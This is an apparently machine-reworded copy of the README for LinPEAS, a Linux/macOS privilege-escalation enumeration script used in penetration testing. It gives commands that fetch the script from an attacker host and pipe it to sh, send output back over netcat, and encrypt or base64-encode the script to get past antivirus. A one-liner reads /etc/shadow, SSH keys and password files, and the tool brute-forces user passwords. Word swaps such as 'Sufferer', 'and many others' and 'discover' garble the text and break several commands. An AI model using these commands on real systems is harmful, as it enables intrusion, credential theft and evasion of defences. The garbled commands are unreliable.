PEASS-ng/linPEAS at grasp · carlospolop/PEASS-ng · GitHub

2023-03-13 05:46:10 [*]

LinPEAS is a script that seek for attainable paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are defined on book.hacktricks.xyz

Test the Native Linux Privilege Escalation guidelines from book.hacktricks.xyz.

MacPEAS

Simply execute linpeas.sh in a MacOS system and the MacPEAS model will likely be mechanically executed

Fast Begin

Discover the newest variations of all of the scripts and binaries in the releases page.

# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/newest/obtain/linpeas.sh | sh

# Native community
sudo python -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Sufferer

# With out curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Sufferer

# Excute from reminiscence and ship output again to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Sufferer

# Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Sufferer
much less -r /dev/shm/linpeas.txt #Learn with colours

# Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/newest/obtain/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64

# Execute from reminiscence in Penelope session
# From: https://github.com/brightio/penelope
> run peass-ng

Firmware Evaluation

In case you have a firmware and also you need to analyze it with linpeas to seek for passwords or unhealthy configured permissions you will have 2 predominant choices.

If you happen to can emulate the firmware, simply run linpeas within it:

cp /path/to/linpeas.sh /mnt/linpeas.sh
chroot /mnt #Supposing you will have mounted the firmware FS in /mnt
bash /linpeas.sh -o software_information,interesting_files,api_keys_regex

If you happen to can’t emulate the firmware, use the -f </path/to/folder param:

# Level to the folder containing the recordsdata you need to analyze
bash /path/to/linpeas.sh -f /path/to/folder

AV bypass

#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass go:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Begin HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass go:AVBypassWithAES | sh #Obtain from the sufferer

#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Begin HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Obtain from the sufferer

Fundamental Info

The purpose of this script is to seek for attainable Privilege Escalation Paths (examined in Debian, CentOS, FreeBSD, OpenBSD and MacOS).

This script would not have any dependency.

It makes use of /bin/sh syntax, so can run in something supporting sh (and the binaries and parameters used).

By default, linpeas will not write something to disk and will not attempt to login as another consumer utilizing su.

By default linpeas takes round 4 minutes to finish, however It might take from 5 to 10 minutes to execute all of the checks utilizing -a parameter (Beneficial choice for CTFs):

From lower than 1 min to 2 minutes to make virtually all of the checks
Virtually 1 min to seek for attainable passwords inside all of the accesible recordsdata of the system
20s/consumer bruteforce with top2000 passwords (want -a) – Discover that this verify is tremendous noisy
1 min to observe the processes with the intention to discover very frequent cron jobs (want -a) – Discover that this verify might want to write some information inside a file that will likely be deleted

Fascinating parameters:

-a (all checks besides regex) – This may execute additionally the verify of processes throughout 1 min, will search extra attainable hashes inside recordsdata, and brute-force every consumer utilizing su with the top2000 passwords.
-e (additional enumeration) – This may execute enumeration checkes which might be averted by default
-r (regex checks) – This may seek for a whole lot of API keys of various platforms within the silesystem
-s (superfast & stealth) – This may bypass a while consuming checks – Stealth mode (Nothing will likely be written to disk)
-P (Password) – Move a password that will likely be used with sudo -l and bruteforcing different customers
-D (Debug) – Print details about the checks that have not found something and concerning the time every verify took
-d/-p/-i/-t (Native Community Enumeration) – Linpeas also can uncover and port-scan native networks

This script has a number of lists included within it to have the ability to shade the outcomes with the intention to spotlight PE vector.

Enumerate and search Privilege Escalation vectors.
This software enum and search attainable misconfigurations (recognized vulns, consumer, processes and file permissions, particular file permissions, readable/writable recordsdata, bruteforce different customers(top1000pwds), passwords...) contained in the host and spotlight attainable misconfigurations with colours.
        Checks:
            -o Solely execute chosen checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files,api_keys_regex). Choose a comma separated record.
            -s Stealth & sooner (do not verify a while consuming checks)
            -e Carry out additional enumeration
            -t Computerized community scan & Web conectivity checks - This selection writes to recordsdata
            -r Allow Regexes (this could take from some minutes to hours)
            -P Point out a password that will likely be used to run 'sudo -l' and to bruteforce different customers accounts by way of 'su'
	    -D Debug mode

        Community recon:
            -t Computerized community scan & Web conectivity checks - This selection writes to recordsdata
	    -d <IP/NETMASK> Uncover hosts utilizing fping or ping. Ex: -d 192.168.0.1/24
            -p <PORT(s)> -d <IP/NETMASK> Uncover hosts in search of TCP open ports (by way of nc). By default ports 22,80,443,445,3389 and one other one indicated by you can be scanned (choose 22 if you happen to do not need to add extra). You may also add an inventory of ports. Ex: -d 192.168.0.1/24 -p 53,139
            -i <IP> [-p <PORT(s)>] Scan an IP utilizing nc. By default (no -p), top1000 of nmap will likely be scanned, however you'll be able to choose an inventory of ports as an alternative. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
             Discover that if you happen to specify some community scan (choices -d/-p/-i however NOT -t), no PE verify will likely be carried out

        Port forwarding:
            -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT Execute linpeas to ahead a port from a neighborhood IP to a distant IP

        Firmware recon:
            -f </FOLDER/PATH> Execute linpeas to go looking passwords/file permissions misconfigs inside a folder

        Misc:
            -h To point out this message
	    -w Wait execution between huge blocks of checks
            -L Power linpeas execution
            -M Power macpeas execution
	    -q Don't present banner
            -N Don't use colors

Hosts Discovery and Port Scanning

With LinPEAS you may also uncover hosts mechanically utilizing fping, ping and/or nc, and scan ports utilizing nc.

LinPEAS will mechanically seek for this binaries in $PATH and allow you to know if any of them is on the market. In that case you should use LinPEAS to hosts dicovery and/or port scanning.

Colours

Particulars

LinPEAS makes use of colours to point the place does every part start. However it additionally makes use of them the determine potencial misconfigurations.

The Purple/Yellow shade is used for identifing configurations that result in PE (99% certain).

The Purple shade is used for identifing suspicious configurations that would result in PE:

Potential exploitable kernel variations
Susceptible sudo variations
Establish processes working as root
Not mounted gadgets
Harmful fstab permissions
Writable recordsdata in attention-grabbing directories
SUID/SGID binaries which have some weak model (it additionally specifies the weak model)
SUDO binaries that can be utilized to escalate privileges in sudo -l (with out passwd) (https://gtfobins.github.io/)
Test /and many others/doas.conf
127.0.0.1 in netstat
Recognized recordsdata that would include passwords
Capabilities in attention-grabbing binaries
Fascinating capabilities of a binary
Writable folders and wilcards inside information about cron jobs
Writables folders in PATH
Teams that would result in root
Recordsdata that would accommodates passwords
Suspicious cronjobs

The Inexperienced shade is used for:

Frequent processes run by root
Frequent not attention-grabbing gadgets to mount
Not harmful fstab permissions
SUID/SGID frequent binaries (the bin was already present in different machines and searchsploit would not determine any weak model)
Frequent .sh recordsdata in path
Frequent names of customers executing processes
Frequent cronjobs

The Blue shade is used for:

Customers with out shell
Mounted gadgets

The Mild Cyan shade is used for:

The Mild Magenta shade is used for:

One-liner Enumerator

Right here you will have an previous linpe model script in a single line, simply copy and paste it😉

The colour filtering is just not obtainable within the one-liner (the lists are too huge)

This one-liner is deprecated (I am not going to replace it any extra), nevertheless it could possibly be helpful in some instances so it’s going to stay right here.

The default file the place all the info is saved is: /tmp/linPE (you’ll be able to change it firstly of the script)

file="/tmp/linPE";RED='33[0;31m';Y='33[0;33m';B='33[0;34m';NC='33[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system info...";printf $B"[*] "$RED"BASIC SYSTEM INFOn"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative systemn"$NC >> $file;(cat /proc/model || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATHn"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Daten"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo versionn"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Helpful software program?n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilitiesn"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environmentn"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"High and cleaned proccessesn"$NC >> $file;ps aux 2>/dev/null | grep -v "[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissionsn"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Servicesn"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Totally different processes executed throughout 1 min (HTB)n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; accomplished; kind $file.tmp1 | uniq | grep -v "[" | sed '/^.{500}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissionsn"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasksn"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /and many others/cron* 2>/dev/null >> $file;cat /and many others/cron* /and many others/at* /and many others/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage informationn"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?n"$NC >> $file;cat /and many others/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering community info...";printf $B"[*] "$RED"NETWORK INFOn"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNSn"$NC >> $file;cat /and many others/hostname /and many others/hosts /and many others/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightboursn"$NC >> $file;cat /and many others/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Portsn"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering customers info...";printf $B"[*] "$RED"USERS INFOn"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Males"$NC >> $file;(id || (whoami && teams)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l with out passwordn"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I've PGP keys?n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusersn"$NC >> $file;awk -F: '($3 == "0") {print}' /and many others/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Loginn"$NC >> $file;w 2>/dev/null >> $file;final 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Customers with consolen"$NC >> $file;cat /and many others/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All usersn"$NC >> $file;cat /and many others/passwd 2>/dev/null | minimize -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering recordsdata info...";printf $B"[*] "$RED"INTERESTING FILESn"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUIDn"$NC >> $file;discover / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGIDn"$NC >> $file;discover / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Recordsdata inside $HOME (restrict 20)n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First recordsdata of /homen"$NC >> $file;discover /house -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Recordsdata inside .ssh listing?n"$NC >> $file;discover  /house /root -name .ssh 2>/dev/null -exec ls -laR {} ; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* filesn"$NC >> $file;discover / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} ; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?n"$NC >> $file;cat /and many others/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /and many others/passwd? Readable /and many others/shadow or /and many others/grasp.passwd?n"$NC >> $file;grep -v '^[^:]*:[x]' /and many others/passwd 2>/dev/null >> $file;cat /and many others/shadow /and many others/grasp.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup  2>/dev/null; discover / -name "*dockerenv*" -exec ls -la {} ; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Seems to be like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Seems to be like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.confn"$NC >> $file;discover / -type f ( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" ) -exec ls -l {} ; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden recordsdata (not in /sys/) (restrict 100)n"$NC >> $file;discover / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backupsn"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Fascinating writable Filesn"$NC >> $file;USER=`whoami`;HOME=/house/$USER;discover / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| kind | uniq >> $file;for g in `teams`; do discover / ( -type f -or -type d ) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; accomplished >> $file;echo "" >> $file;printf $Y"[+] "$RED"Internet recordsdata?(output restricted)n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/native/www/apache22/knowledge/ 2>/dev/null | head >> $file;ls -alhR /choose/lampp/htdocs/ 2>/dev/null | head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup recordsdata?n"$NC >> $file;discover /var /and many others /bin /sbin /house /usr/native/bin /usr/native/sbin /usr/bin /usr/video games /usr/sbin /root /tmp -type f ( -name "*again*" -o -name "*bck*" ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Discover IPs inside logsn"$NC >> $file;grep -a -R -o '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' /var/log/ 2>/dev/null | kind | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Discover 'password' or 'passw' string inside /house, /var/www, /var/log, /etcn"$NC >> $file;grep -lRi "password|passw" /house /var/www /var/log 2>/dev/null | kind | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (it's essential places the password and the outcome seem in console)n"$NC >> $file;sudo -l;

PEASS Fashion

Are you a PEASS fan? Get now our merch at PEASS Shop and present your love for our favourite peas

Collaborate

If you wish to assist with the TODO duties or with something, you are able to do it utilizing github issues or you’ll be able to submit a pull request.

If you happen to discover any situation, please report it utilizing github issues.

Linpeas is being up to date each time I discover one thing that could possibly be helpful to escalate privileges.

Advisory

All of the scripts/binaries of the PEAS Suite must be used for approved penetration testing and/or instructional functions solely. Any misuse of this software program is not going to be the duty of the creator or of another collaborator. Use it at your personal networks and/or with the community proprietor’s permission.

By Polop^(TM)

Source Link